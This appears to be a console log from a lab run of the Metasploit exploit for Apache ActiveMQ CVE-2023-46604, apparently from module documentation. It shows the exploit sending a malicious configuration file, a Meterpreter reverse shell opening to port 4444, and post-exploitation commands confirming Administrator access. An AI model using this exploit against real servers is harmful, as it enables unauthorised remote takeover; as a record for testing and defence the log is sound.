[*] 192.168.86.50    apache_activemq_rce_cve_2023_46604 - 192.168.86.50:61616 - Sent ClassPathXmlApplicationContext configuration file.
[*] 192.168.86.50    apache_activemq_rce_cve_2023_46604 - 192.168.86.50:61616 - Sent ClassPathXmlApplicationContext configuration file.
[*] Sending stage (200774 bytes) to 192.168.86.50
[*] Meterpreter session 1 opened (192.168.86.42:4444 -> 192.168.86.50:51699) at 2023-11-01 17:32:06 +0000

msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WIN-V28QNSO2H05\Administrator
meterpreter > pwd
C:\apache-activemq-5.15.3\bin
meterpreter > sysinfo
Computer        : WIN-V28QNSO2H05
OS              : Windows 2016+ (10.0 Build 20348).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.86.50 - Meterpreter session 1 closed.  Reason: User exit
msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > 
```